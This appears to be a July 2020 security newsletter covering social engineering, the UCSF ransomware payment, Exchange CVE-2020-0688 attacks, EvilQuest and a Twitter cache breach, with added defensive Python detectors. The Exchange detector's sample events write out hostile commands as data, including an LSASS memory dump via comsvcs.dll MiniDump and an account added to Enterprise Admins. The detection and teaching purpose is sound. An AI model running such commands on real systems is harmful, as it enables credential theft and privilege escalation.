Avantia Threat Update


Updated: Jul 8, 2020


How to protect your business from social engineering; get your analysis of the state of the Dark Web after Covid-19; the University of California San Francisco pays ransomware hackers US$1.14 million to salvage research; Microsoft: patch your Exchange servers, they are under attack; new EvilQuest ransomware discovered targeting macOS; REPORT: the more cybersecurity tools an enterprise deploys, the less effective its defences are; healthcare data breaches keep climbing; Twitter apologises for its breach; Australian cyberattacks illustrate the importance of basic training; and major breaches in AUSTRALIA, CANADA, UNITED KINGDOM & UNITED STATES.

Dark Web Top Threats

Top Source Hits: ID Theft Forums

Top Compromise Type: Domain

Top Industry: Education & Research

Top Employee Count: 1-10



Cyber criminals have many tricks up their sleeves when it comes to compromising sensitive data. They don’t always rely on system vulnerabilities and sophisticated hacks. They’re just as likely to target an organisation’s employees. The attack methods they use to do this are known as social engineering.

What is social engineering? Social engineering is a collective term for ways in which fraudsters manipulate people into performing certain actions. It’s generally used in an information security context to refer to the tactics crooks use to trick people into handing over sensitive information or exposing their devices to malware. This often comes in the form of phishing scams – messages that are supposedly from a legitimate sender that ask the recipient to download an attachment or follow a link that directs them to a bogus website. However, social engineering isn’t always malicious. For example, say you need someone to do you a favor, but you’re unsure that they’ll agree if you ask them apropos of nothing. You might grease the wheels by offering to do something for them first, making them feel obliged to say yes when you ask them to return the favor. That’s a form of social engineering. You’re performing an action that will compel the person to do something that will benefit you. Understanding social engineering in this context helps you see that social engineering isn’t simply an IT problem. It’s a vulnerability in the way we make decisions and perceive others – something we delve into more in the next section.

Why social engineering works Think of the human brain as a security network and its susceptibility to being fooled as a system vulnerability. That makes social engineering the exploit that fraudsters use to take advantage of that vulnerability. But instead of malware injection or credential stuffing, criminals use rhetorical devices – ways of speaking that persuade us to follow their direction. For an idea of how they do this, let’s take a look at Robert Cialdini’s six principles of persuasion:

1. Reciprocity

This is the notion that, when you do something for someone, they feel obliged to return the favor. Cialdini uses the example of a waiter or waitress in a restaurant giving you a small gift with your bill, such as a mint or a fortune cookie. This gesture has been shown to increase the tip customers leave by as much as 14% – and when the item is implied to be a special reward (“For you nice people, here’s an extra mint”), the tip increases by 23%. Reciprocity can be particularly dangerous in a cyber security context because it shows how rarely we think about the motives behind supposedly generous acts – or, if we are aware of them, how we stick to our social obligations anyway.

2. Scarcity

This principle states that people are likely to want something if they know there’s a finite supply. It works particularly well when the person or organisation providing the service announces a reduction, emphasising how scarce the service is. For example, when British Airways announced that it would be cutting back on its London–New York Concorde service due to a lack of customers, ticket sales jumped. Nothing about the service had changed, nor had the price dropped. British Airways hadn’t reinforced the benefits of flying by Concorde or announced that it would be stopping the service altogether. But what it did was imply that the service might not be available in the future. This technique can also be seen when organisations market their product as “while stocks last”. The aim is to create a sense of urgency, forcing people to act now for fear of missing out.

3. Authority

This is the concept that people are more likely to trust experts in their fields – particularly when they can back up their expertise with evidence. Cialdini notes, for example, that we’re more likely to follow a medical professional’s advice if we’re aware of their credentials. By highlighting their expertise – whether that’s by displaying their qualifications on the wall, referring to themselves as ‘Doctor’ or listing their professional experience – they assure the patient that they are trustworthy.

4. Consistency

This principle exploits people’s unwillingness to be hypocritical. The social engineer nudges the victim into a seemingly harmless opinion or act, then uses that logic to force them into a larger, more consequential position. Cialdini cites the example of homeowners who had agreed to place a small postcard in the front windows of their homes supporting a Drive Safely campaign. A few weeks later, those people were far more likely to agree to erect a large, unsightly billboard in their gardens displaying the same message, compared with a neighbourhood that hadn’t first been asked to display postcards. In another example, a health centre found that patients were 18% less likely to miss an appointment if they wrote down the details themselves instead of having the receptionist do it. The simple act of writing down the appointment details reinforced the fact that it was the patient’s obligation to turn up. This technique can also be seen in the likes of the sunk cost fallacy – in which someone continues to spend time, money or effort on something because they don’t want to waste their investment or accept that they made a mistake. You see this error often in cyber crime. Once a scammer has someone on the hook, they will have a much easier time persuading the victim to comply with further requests.

5. Liking

The fifth principle – that people are more likely to agree to something when asked by someone they like – is just as likely to occur accidentally as deliberately. After all, some people are simply likeable, and through no conscious effort on their part, they find that others are more willing to do them favors. But what makes a person likeable? Cialdini says that there are three important factors: we like people who are similar to us, who pay us compliments and who cooperate towards mutual goals. Cialdini refers to a study in which a group of business students were almost twice as successful in a sales negotiation when they shared some personal information with the prospective investor and found something the two parties had in common before getting down to business. However, there’s another factor at play in this example. It’s not just that the students asked the right questions; it’s the way those questions were asked. Perhaps the most important thing that makes someone likeable is if they appear genuine. People are generally good at spotting when someone is disingenuous, so it can be very hard to feign likeability in face-to-face interaction. But via email, we have the time to curate what we say – something that’s particularly true for scammers, who sometimes spend hours crafting templates for their emails.

6. Consensus

The final principle is consensus, which states that when people are unsure what to do, they follow the actions and behaviors of others. Cialdini uses the example of a study in which hotels tried to get guests to reuse towels and linens. It found that the most effective way of doing that wasn’t to highlight the benefits of reusing towels (such as it being environmentally friendly) but simply to state that the majority of guests already do this. It at first seems incomprehensible that we’re more effectively persuaded by an argument that’s essentially ‘everyone else is doing it’ than by being presented with evidence, but it aligns with a lot of our other actions. Consider the last time you were in an unfamiliar environment; did you not look at how others were acting and follow their lead? The principle of consensus demonstrates that people don’t need to be given a reason to comply with a request; rather, they can be influenced by pointing to the actions of those around them.

Common social engineering attack techniques

Pretexting - This technique forms the context of social engineering scams, referring to the pretext – or false scenario – that scammers use to contact victims. In a typical social engineering scam, the pretext might be that there has been suspicious activity on your Netflix account or that you need to confirm your payment card details for an Amazon order.

Baiting - This is a specific type of phishing scam in which the scammers claim they have something beneficial for victims if they follow their instructions. Whereas the examples we listed above use fear as a motivator – ‘someone is trying to break into your account’, ‘your package won’t arrive’ – baiting relies on curiosity and desire. For example, a scam might direct the victim towards a website where they can supposedly download music, TV series or films. However, that website is designed to capture personal information or trick people into downloading infected files. Baiting has also been used in physical attacks, with scammers leaving infected USB drives lying around conspicuously, waiting for someone to pick them up thinking that there might be something interesting on them.

Quid pro quo - Similar to baiting, quid pro quo attacks claim to help the victim – usually by offering a service – in exchange for information. The difference is that these types of attacks are supposedly mutually beneficial. The prototypical quid pro quo attack was the Nigerian prince scam: the attacker has vast sums of money they need help transferring, and if you give them the cash to do this, you’ll be recompensed. Attacks have become more credible since then. For example, an attacker might phone employees claiming to be from technical support. Eventually they’ll find someone who was genuinely waiting for assistance and who will let the scammer do whatever they want to their computer, assuming they are a colleague solving the issue.

Scareware - This attack is designed to trick people into buying unnecessary software. It begins with a pop-up ad – generally imitating a Windows error message or antivirus program – claiming that the victim’s computer has been infected with malware. Alongside the message, the ad will claim that you need to purchase or upgrade your software to fix the issue. Those that do end up installing bogus software that appears to scan your system but is in fact either doing nothing or installing malware.

Angling - This is a specific type of phishing in which scammers pose as customer representatives on social media. They create accounts that imitate an official brand and wait for someone to post a complaint about that organisation on Facebook or Twitter. The scammer will respond in one of two ways. They might link to an official complaint channel or offer the victim something by way of an apology, such as a discount on their next purchase. Both these approaches are designed to steal the victim’s personal information.

How to protect yourself from social engineering

There are many ways you can protect yourself from social engineering attacks. For example, you should:

Learn the most common techniques that criminals use in phishing attacks;

Implement two-factor authentication to secure your accounts; and

Ensure that your antivirus software is regularly updated.

Organisations that want to address the threat of social engineering should conduct regular staff awareness training and test employees’ susceptibility with a social engineering penetration test. With this service, experts will try to trick your employees into handing over sensitive information and monitor how they respond. Do they fall right into the trap? Do they recognise that it’s a scam and ignore it? Do they contact a senior colleague to warn them? With this information, along with a detailed report containing the findings and guidance, you can pinpoint your security weaknesses and fix them before you’re targeted for real.


The world has changed in the wake of the COVID-19 pandemic – and so has the Dark Web.  Gain insight into the current climate of the post-pandemic Dark Web, see what threats are rising on the Dark Web now, and what we think you need to know to help your customers adjust their cybersecurity strategies. Get a snapshot of the facts that you and your clients can use, because 2020 has been a wild year everywhere, including on the Dark Web.



The University of California at San Francisco (UCSF) has admitted to paying a partial ransom demand of $1.14 million to recover files locked down by a ransomware infection. The university was struck on June 1, when malware was found in the UCSF School of Medicine's IT systems. Administrators quickly attempted to isolate the infection and ring-fence a number of systems, which prevented the ransomware from travelling to the core UCSF network and causing further damage. While the school says the cyberattack did not affect "our patient care delivery operations, overall campus network, or COVID-19 work," UCSF servers used by the School of Medicine were encrypted. Ransomware can be particularly destructive because once a system is compromised, content is encrypted and rendered inaccessible. Victims are then faced with a choice: potentially lose their files, or pay a ransom demand. Cyberattackers will often include a time limit for the decision to ramp up the pressure to pay. As shown in this case, blackmail demands can reach millions of dollars. "The attackers obtained some data as proof of their action, to use in their demand for a ransom payment," the university said in a statement. "We are continuing our investigation, but we do not currently believe patient medical records were exposed." It is not recommended that victims bow to ransom demands, as this furthers criminal enterprises. However, UCSF said it took the "difficult decision to pay some portion of the ransom" as some of the information stored on the servers is "important to some of the academic work we pursue as a university serving the public good." The Netwalker gang is believed to be responsible. The BBC was able to follow the negotiation, conducted on the Dark Web, between Netwalker and the university.
The threat actors first demanded $3 million; UCSF countered with a $780,000 offer, together with a plea that the novel coronavirus pandemic had been "financially devastating" to the academic institution. This offer was dismissed, and a back-and-forth eventually led to the agreed figure of $1,140,895, paid in Bitcoin (BTC). In return for payment, the threat actors provided a decryption tool and said they would delete the data stolen from the servers. SophosLabs says the Netwalker toolkit is extensive and includes the Netwalker, Zeppelin, and Smaug ransomware, Windows-based reconnaissance tools, and brute-force credential software. The researchers say this group tends to focus on large organizations rather than individual targets. In past attacks, Netwalker has targeted systems through well-known public vulnerabilities or via credential stuffing against machines with remote desktop services enabled. UCSF pulled in cybersecurity consultants to investigate the incident and is currently working with the FBI. At the time of writing, servers are still down. "We continue to cooperate with law enforcement, and we appreciate everyone's understanding that we are limited in what we can share while we continue with our investigation," the university added.


Microsoft is warning organizations that use Exchange email servers to shore up their systems now after observing a massive spike in highly skilful attacks this April. The company's alert details how advanced attackers are using freely available open-source software and a known, critical vulnerability to attack Exchange email servers, one of the most valuable sources of information in any organization. Exchange has been under attack for months by multiple government-backed groups, who pounced on a particularly nasty Exchange flaw (CVE-2020-0688) shortly after Microsoft released patches in February. The flaw meant that every Exchange release of the past decade shipped with the same static cryptographic keys for the Exchange Control Panel (ECP) backend. Because those keys protect the ASP.NET ViewState, an attacker holding any valid mailbox credential could forge serialised ViewState data, run code as SYSTEM and take full control of the server, gaining access to a target's email store. Many organizations ignored Microsoft's warning to patch the bug, even though it predicted the flaw would come under attack in the near future. By April, security researchers warned that over 350,000 vulnerable Exchange servers were exposed on the internet. "Drop everything and patch this vulnerability immediately," Jonathan Cran, head of research at Kenna Security, warned at the time. Microsoft says the most common way Exchange servers are compromised is via phishing or attacks on desktop flaws, with the attackers then moving laterally within the organization to reach the Exchange server, the main system housing a target's email communications. But in April it saw a rise in attacks exploiting a remote code execution vulnerability in the Internet Information Services (IIS) component of a target Exchange server.
"The first scenario is more common, but we're seeing a rise in attacks of the second variety; specifically, attacks that exploit Exchange vulnerabilities like CVE-2020-0688," said Hardik Suri of the Microsoft Defender ATP Research Team.  "The security update that fixes this vulnerability has been available for several months, but, notably, to this day, attackers find vulnerable servers to target. "In many cases, after attackers gain access to an Exchange server, what follows is the deployment of web shell into one of the many web accessible paths on the server."   Microsoft's new warning comes a week after the Australian government raised an alarm over ongoing attacks against organizations in the country.  The Australian Cyber Security Centre's (ACSC) lengthy advisory doesn't highlight CVE-2020-0688, but it does detail similar techniques to the ones Microsoft describes for attacks on IIS and Exchange email servers.  In both cases, the attackers planted web shell backdoor code on internet-accessible parts of Exchange, such as the log-on page for Outlook on the web, formerly Outlook Web Access. 

According to Microsoft, there were multiple concurrent campaigns behind the surge in Exchange attacks during April, with most employing web shells on internet-facing Exchange servers for initial access. The attackers used multiple web shells, but the most widely used was the China Chopper web shell.   "The telemetry showed attackers operating on on-premises Exchange servers using deployed web shells," says Suri.  "Whenever attackers interacted with the web shell, the hijacked application pool ran the command on behalf of the attacker, generating an interesting process chain.  "Common services, for example, Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC, formerly known as the Exchange Control Panel or ECP), executing net.exe, cmd.exe, and other known living-off-the-land binaries (LOLBins) like mshta.exe are very suspicious and should be further investigated," warned Suri. After deploying a web shell, the attackers explored the target domain and, where a misconfigured server was found, they added new accounts to high-privilege groups like Administrators, Remote Desktop Users, and Enterprise Admins.  This gave attackers "unrestricted access to any users or group in the organization". Afterwards, credentials to these accounts were targeted using native Windows tools to dump Local Security Authority Subsystem Service (LSASS) memory – a key service for handling authentication in Active Directory domains – and upload them to a remote server for cracking.   To gain persistence on a machine purely in memory, or without ever touching a disk, the attackers turned to open-source software. On systems configured to detect the open-source credential dumping tool, Mimikatz, the attackers used a modified version placed in a wrapper written in the Go programming language.  "The binary used the open-source MemoryModule library to load the binary using reflective DLL injection. 
Thus, the payload never touched the disk and was present only in memory, achieving a fileless persistence," notes Suri. The attackers also attempted to disable Microsoft Defender Antivirus and to disable archive scanning, so that the .zip archives they produced would not be inspected; compression tools like rar.exe were used to package stolen email .pst files and memory dumps. Suri recommends that organizations apply available updates, enable multi-factor authentication, and ensure that tamper protection is enabled on Windows 10 machines to prevent attackers disabling antivirus. He also suggests that organizations review highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Security teams should also practise the principle of least privilege and prioritise alerts indicating suspicious activity on Exchange servers.
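The process chain Suri describes (an Exchange application pool's w3wp.exe running cmd.exe, net.exe or mshta.exe), the additions to privileged groups and the LSASS dumps are all visible in process-creation telemetry. The script below is an added illustration written for this page, not Microsoft's code or tooling: it runs three detection rules over a handful of constructed events. It assumes events are dicts carrying Sysmon event ID 1 style fields (ParentImage, ParentCommandLine, Image, CommandLine) and that Exchange's IIS worker processes name their application pool on the command line (`w3wp.exe -ap "MSExchangeOWAAppPool" ...`), which is how IIS launches them; the benign fourth event is there to show the scoping.

```python
"""Added example (not Microsoft's code or tooling): detection logic for the three
post-compromise behaviours the Exchange write-up describes, run over constructed
process-creation events.

Assumptions not stated on the page: events are dicts with Sysmon event ID 1 style
fields (ParentImage, ParentCommandLine, Image, CommandLine), and Exchange's IIS
worker processes name their application pool on the command line
(w3wp.exe -ap "MSExchangeOWAAppPool" ...), which is how IIS launches them.
"""
import re
from typing import Dict, Iterable, List

# Application pools behind Exchange's internet-facing paths (OWA, ECP, EWS, Autodiscover).
EXCHANGE_APP_POOLS = ("MSExchangeOWAAppPool", "MSExchangeECPAppPool",
                      "MSExchangeServicesAppPool", "MSExchangeAutodiscoverAppPool")

# LOLBins the write-up names, plus the interpreters a web shell typically reaches for.
LOLBINS = {"cmd.exe", "net.exe", "net1.exe", "mshta.exe", "powershell.exe",
           "rundll32.exe", "certutil.exe", "whoami.exe"}

# Groups the write-up says the attackers added accounts to.
PRIVILEGED_GROUPS = {"administrators", "remote desktop users",
                     "enterprise admins", "domain admins"}

# net group / net localgroup <group> <member> /add
_NET_ADD = re.compile(
    r'\bnet1?(?:\.exe)?\s+(?:local)?group\s+"?([^"/]+?)"?\s+\S+\s+/add\b', re.I)
# LSASS memory dumps via native tooling (comsvcs.dll MiniDump) or procdump.
_LSASS_DUMP = re.compile(r"comsvcs\.dll.*minidump|procdump.*lsass", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules that fire for one process-creation event."""
    hits: List[str] = []
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    parent_cmd = event.get("ParentCommandLine", "").lower()
    cmd = event.get("CommandLine", "")

    # 1. Web shell execution: an Exchange IIS worker spawning a LOLBin.
    if (parent == "w3wp.exe" and child in LOLBINS
            and any(pool.lower() in parent_cmd for pool in EXCHANGE_APP_POOLS)):
        hits.append("exchange_w3wp_spawns_lolbin")

    # 2. Privilege escalation: an account added to a high-privilege group.
    m = _NET_ADD.search(cmd)
    if m and m.group(1).strip().lower() in PRIVILEGED_GROUPS:
        hits.append("account_added_to_privileged_group")

    # 3. Credential theft: LSASS memory dumped for offline cracking.
    if _LSASS_DUMP.search(cmd):
        hits.append("lsass_memory_dump")
    return hits


def scan(events: Iterable[Dict[str, str]]) -> List[dict]:
    """Index every event that trips at least one rule."""
    findings = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append({"index": i, "hits": hits})
    return findings


# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentCommandLine": r'c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangeOWAAppPool" -v "v4.0"',
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "whoami"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": "cmd.exe",
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r'net group "Enterprise Admins" svc_backup /add /domain'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": "cmd.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\ls.dmp full"},
    # Not flagged: a non-Exchange application pool is outside rule 1's scope,
    # which is what keeps the rule quiet on servers that host other IIS sites.
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentCommandLine": r'w3wp.exe -ap "DefaultAppPool" -v "v4.0"',
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Rule 1 is the one to alert on with the least tuning: OWA and ECP pools have no legitimate reason to launch a shell, so a single hit is worth a ticket. Rules 2 and 3 match the write-up's later stages and are useful as corroboration on the same host within a short window.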


EvilQuest ransomware encrypts macOS systems but also installs a keylogger and a reverse shell for full control over infected hosts. Named OSX.EvilQuest, this ransomware is different from previous macOS ransomware threats because besides encrypting the victim's files, EvilQuest also installs a keylogger and a reverse shell, and steals cryptocurrency wallet-related files from infected hosts. "Armed with these capabilities, the attacker can maintain full control over an infected host," said Patrick Wardle, Principal Security Researcher at Jamf. This means that even if victims paid, the attacker would still have access to their computer and could continue to steal files and keystrokes.

Wardle is currently one of the many macOS security researchers analyzing this new threat. Others investigating EvilQuest include Thomas Reed, Director of Mac & Mobile at Malwarebytes, and Phil Stokes, macOS security researcher at SentinelOne. Reed and Stokes are currently looking for a weakness or bug in the ransomware's encryption scheme that could be exploited to create a decryptor and help infected victims recover their files without paying the ransom. The researcher who first spotted the new EvilQuest ransomware is K7 Lab security researcher Dinesh Devadoss. Devadoss tweeted about his finding on June 29. However, new evidence that surfaced in the meantime reveals that EvilQuest has in reality been distributed in the wild since the start of June 2020. Reed said that Malwarebytes has found EvilQuest hidden inside pirated macOS software uploaded to torrent portals and online forums. Devadoss spotted EvilQuest hidden in a software package called Google Software Update, Wardle found samples of EvilQuest inside a pirated version of the popular DJ software Mixed In Key, and Reed spotted it hidden inside the macOS security tool Little Snitch. However, Reed told us he believes the ransomware is most likely more broadly distributed, via many more apps than just these three. Wardle, who published an in-depth technical analysis of EvilQuest earlier, said the malware is pretty straightforward, as it moves to encrypt the user's files as soon as it's executed. Once the file encryption ends, a popup is shown to the user, letting the victim know they've been infected and their files encrypted. The victim is directed to open a ransom note in the form of a text file that has been placed on their desktop. Stokes said that the ransomware will encrypt any files with the following file extensions:

.pdf, .doc, .jpg, .txt, .pages, .pem, .cer, .crt, .php, .py, .h, .m, .hpp, .cpp, .cs, .pl, .p, .p3, .html, .webarchive, .zip, .xsl, .xslx, .docx, .ppt, .pptx, .keynote, .js, .sqlite3, .wallet, .dat

After the encryption process ends, the ransomware installs a keylogger to record all the user's keystrokes, a reverse shell so the attacker can connect to the infected host and run custom commands, and will also look to steal the following types of files, usually employed by cryptocurrency wallet applications:

"wallet.pdf", "wallet.png", "key.png", "*.p12"

In his own analysis of EvilQuest, Reed also noted that the ransomware attempts to modify files specific to Google Chrome's update mechanism, and use the files as a form of persistence on infected hosts. "These [Chrome update] files had the content of the patch file prepended to them, which of course would mean that the malicious code would run when any of these files is executed," Reed said. "However, Chrome will see that the files have been modified, and will replace the modified files with clean copies as soon as it runs, so it's unclear what the purpose here is." Wardle, who has created several open-source macOS security tools, said that a tool he released in 2016, named RansomWhere, can detect and stop EvilQuest from running. Reed also said that Malwarebytes for Mac has been updated to detect and stop this ransomware before it does any damage. EvilQuest is the third ransomware strain to exclusively target macOS users, after KeRanger and Patcher. Another macOS ransomware strain called Mabouia only existed at a theoretical level and was never released in the real world.

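The text credits RansomWhere with stopping EvilQuest; tools of that kind work behaviourally rather than by signature, watching for a process that rapidly rewrites user files with ciphertext-like content. The script below is an added illustration written for this page, not RansomWhere's or Malwarebytes' code, showing that heuristic applied to the extension list above. It assumes a file-event stream of (process name, path) pairs and uses constructed files written to a temporary directory; the "patch" process name is illustrative only. Two details matter: Shannon entropy alone would flag every healthy .zip or .jpg, so a file is only counted when it also lacks the magic bytes its extension implies, and a single flagged file is not enough, a per-process burst is.

```python
"""Added example (not RansomWhere's or Malwarebytes' code): an entropy-and-burst
heuristic of the kind behavioural anti-ransomware tools use, applied to the file
types the page says EvilQuest encrypts.

Heuristic (an assumption, not taken from the page): a process is suspicious when it
writes several targeted files whose content is near-random (high Shannon entropy)
AND no longer carries the magic bytes the extension implies. The magic check keeps
legitimately compressed types (.zip, .jpg, .png, .docx) from tripping the rule.
"""
import math
import os
import tempfile
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Extensions the page lists (subset) plus the wallet artefacts it says are stolen.
TARGETED = {".pdf", ".doc", ".docx", ".jpg", ".txt", ".pages", ".pem", ".zip",
            ".py", ".js", ".sqlite3", ".wallet", ".dat", ".p12", ".png"}

# Expected leading bytes for types that are high-entropy even when healthy.
MAGIC = {".zip": b"PK\x03\x04", ".docx": b"PK\x03\x04", ".jpg": b"\xff\xd8\xff",
         ".png": b"\x89PNG", ".pdf": b"%PDF", ".sqlite3": b"SQLite format 3\x00"}

ENTROPY_THRESHOLD = 7.2   # bits/byte; text sits around 4-5, ciphertext close to 8
BURST_THRESHOLD = 3       # flagged files per process before we call it ransomware


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(path: str) -> bool:
    """True when a targeted file is high-entropy and lacks its expected magic."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in TARGETED:
        return False
    with open(path, "rb") as f:
        head = f.read(64 * 1024)          # first 64 KiB is enough for the estimate
    if ext in MAGIC and head.startswith(MAGIC[ext]):
        return False                      # healthy compressed/container file
    return shannon_entropy(head) >= ENTROPY_THRESHOLD


def assess_writes(writes: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """writes: (process_name, path) pairs. Returns the processes whose count of
    ciphertext-like writes reaches BURST_THRESHOLD, with the paths involved.
    Files are read at call time; a live monitor would evaluate each close-write."""
    flagged = defaultdict(list)
    for proc, path in writes:
        if looks_encrypted(path):
            flagged[proc].append(path)
    return {p: paths for p, paths in flagged.items() if len(paths) >= BURST_THRESHOLD}


def build_sample_dir() -> Tuple[str, List[Tuple[str, str]]]:
    """Constructed sample, not victim data: healthy files written by ordinary apps,
    then four targeted files filled with random bytes by a process we call "patch"
    (an illustrative name; the page only quotes Reed mentioning a "patch file")."""
    d = tempfile.mkdtemp(prefix="evilquest_demo_")
    writes: List[Tuple[str, str]] = []

    def put(proc: str, name: str, content: bytes) -> None:
        path = os.path.join(d, name)
        with open(path, "wb") as f:
            f.write(content)
        writes.append((proc, path))

    put("TextEdit", "notes.txt", b"meeting notes, nothing secret here\n" * 100)
    put("Preview", "photo.jpg", b"\xff\xd8\xff\xe0" + os.urandom(4000))     # healthy JPEG
    put("Archive Utility", "bundle.zip", b"PK\x03\x04" + os.urandom(4000))  # healthy zip
    for name in ("report.pdf", "cert.pem", "wallet.dat", "main.py"):
        put("patch", name, os.urandom(4096))   # ciphertext-like, magic gone
    return d, writes


if __name__ == "__main__":
    _, sample = build_sample_dir()
    print(assess_writes(sample))   # only "patch" should appear
```

Types with no well-known magic (.dat, .wallet, .pem in binary DER form) can still produce false positives on genuinely random-looking legitimate content, which is why the burst threshold exists and why a blocking tool should suspend the process rather than kill it and ask the user, as RansomWhere does.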

New research highlights how throwing money indiscriminately at security doesn’t guarantee results. The enterprise is slowly improving its response to cybersecurity incidents, but in the same breath, it is still investing in too many tools that can actually reduce the effectiveness of defense. 

Recently, IBM released the results of a global survey, conducted by the Ponemon Institute and featuring responses from over 3,400 security and IT staff worldwide. The research suggests that while investment and planning are on the rise, effectiveness is not on the same incline, with response efforts hindered by the complexity of fragmented toolsets. The research, IBM's fifth annual Cyber Resilient Organization Report, says that while organizations are improving in cyberattack planning, detection, and response, their ability to contain an active threat has declined by 13%. On average, enterprises deploy 45 cybersecurity-related tools on their networks. The widespread use of too many tools may contribute to an inability not only to detect, but also to defend against active attacks. Enterprises that deploy over 50 tools ranked themselves 8% lower in their ability to detect threats, and 7% lower in their defensive capabilities, than companies employing fewer toolsets. It does appear that the enterprise cybersecurity scene is reaching a new level of maturity, however, with 26% of respondents saying that their organizations have now adopted formal, company-wide Cyber Security Incident Response Plans (CSIRPs), up from 18% five years ago. In total, however, 74% of respondents said their cybersecurity planning posture still leaves much to be desired, with no plans, ad-hoc plans, or inconsistency still a thorn in the side of IT staff. In addition, among those who have adopted a response plan, only a third have created playbooks for the common attack types to watch out for during daily operations. "Since different breeds of attack require unique response techniques, having pre-defined playbooks provides organizations with consistent and repeatable action plans for the most common attacks they are likely to face," the report notes.
According to IBM, a lack of planning and incident response testing can lead to a damages bill up to $1.2 million higher than a cyberattack would otherwise have cost a victim company. The cost can be high in terms of disruption, too: only 39% of enterprise companies with a CSIRP in place have experienced a severely disruptive attack in the past two years, compared with 62% of those that did not implement any form of plan. In light of the COVID-19 pandemic and the rapid changes many of us have experienced in our workplaces, CSIRPs need to be reviewed and, if need be, changed to adapt to the working-from-home environment. However, only 7% of respondents review these plans quarterly, and 40% have no review period set whatsoever. "With business operations changing rapidly due to an increasingly remote workforce, and new attack techniques constantly being introduced, this data suggests that many businesses are relying on outdated response plans which don't reflect the current threat and business landscape," IBM added.



Exploit: Accidental Data Sharing

Twitter: Social Media Platform 

Risk to Small Business: 2.602 = Moderate - Twitter sent a notification to business clients last week acknowledging a data breach that exposed the personal and billing information of some users. The breach occurred due to an issue that led to some users’ sensitive information being stored in the browser’s cache. Twitter explained that it recently became aware of this issue. Business users were warned that prior to May 20, 2020, if you viewed your billing information on ads.twitter or analytics.twitter your account’s billing information may be at risk.

Individual Risk: 2.602 = Moderate - Twitter did not release an estimate of the accounts affected, but it did specify that only business customers were at risk, and only a percentage of business customers had any details exposed. The leaked information potentially included email addresses, users’ contact numbers, and the last four digits of credit card numbers used for Ads accounts. Twitter business customers should monitor potentially affected payment accounts.

Customers Impacted: Unknown

Effect On Customers: Information like this quickly makes its way to the Dark Web, setting businesses up for cyberattacks including spear phishing attempts. In addition, failing to guard a business customer’s recurring payment information can negatively impact their relationship with that service provider.
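The mechanism Twitter describes, billing data ending up in the browser cache, is a response-header problem: a page that renders card fragments or invoices is stored on disk by the browser unless the server tells it not to. The check below is an added illustration, not Twitter's code. Given the headers a billing page returns (passed as a plain dict, an assumption of this example), it reports the reasons a browser could retain the body and shows the header set that prevents it, following HTTP caching semantics (RFC 7234): `no-store` forbids storage, `private` only excludes shared caches, `no-cache` only forces revalidation, and no directives at all leave the browser free to cache heuristically.

```python
"""Added example (not Twitter's code): audit the cache headers of a response that
carries sensitive data and produce the hardened set.

Assumptions: headers are a plain dict of name -> value (case-insensitive names);
rules follow RFC 7234 directive semantics as summarised in the comments.
"""
from typing import Dict, List


def _directives(value: str) -> Dict[str, str]:
    """Parse 'a, b=1, c="x"' into {'a': '', 'b': '1', 'c': 'x'}."""
    out: Dict[str, str] = {}
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        out[name.strip().lower()] = arg.strip().strip('"')
    return out


def cache_findings(headers: Dict[str, str]) -> List[str]:
    """Return the reasons a browser may keep this response on disk; empty means safe."""
    h = {k.lower(): v for k, v in headers.items()}
    cc = _directives(h.get("cache-control", ""))
    findings: List[str] = []
    if "no-store" in cc:
        return findings                      # the only directive that forbids storage
    if "no-cache" in cc:
        findings.append("no-cache only forces revalidation; the body is still written to disk")
    if "private" in cc:
        findings.append("private excludes shared caches but the browser cache still stores the body")
    if cc.get("max-age", "") not in ("", "0"):
        findings.append(f"max-age={cc['max-age']} explicitly allows reuse")
    if "expires" in h and "max-age" not in cc:
        findings.append("Expires without max-age; a future date allows storage")
    if not cc and "expires" not in h:
        findings.append("no caching directives; browsers apply heuristic caching")
    return findings


# What a page holding billing details should send. no-store does the work; Pragma
# and Expires are belt-and-braces for HTTP/1.0-era intermediaries.
HARDENED_HEADERS = {
    "Cache-Control": "no-store, max-age=0",
    "Pragma": "no-cache",
    "Expires": "0",
}

# Constructed samples for the two outcomes (not Twitter's actual responses).
SAMPLE_RESPONSES = {
    "billing page, weak": {"Content-Type": "text/html",
                           "Cache-Control": "private, max-age=600"},
    "billing page, hardened": {"Content-Type": "text/html", **HARDENED_HEADERS},
    "json api, no directives": {"Content-Type": "application/json"},
}

if __name__ == "__main__":
    for name, hdrs in SAMPLE_RESPONSES.items():
        print(name, "->", cache_findings(hdrs) or "OK")
```

The weak sample is the common mistake: `private` feels like a lock but it is aimed at CDNs and proxies, not the user's own disk. Run the check as a unit test over every route that renders billing, profile or admin data, and pair it with a browser-side look at about:cache or the DevTools Network panel, which shows whether a response was actually served from disk.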

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.
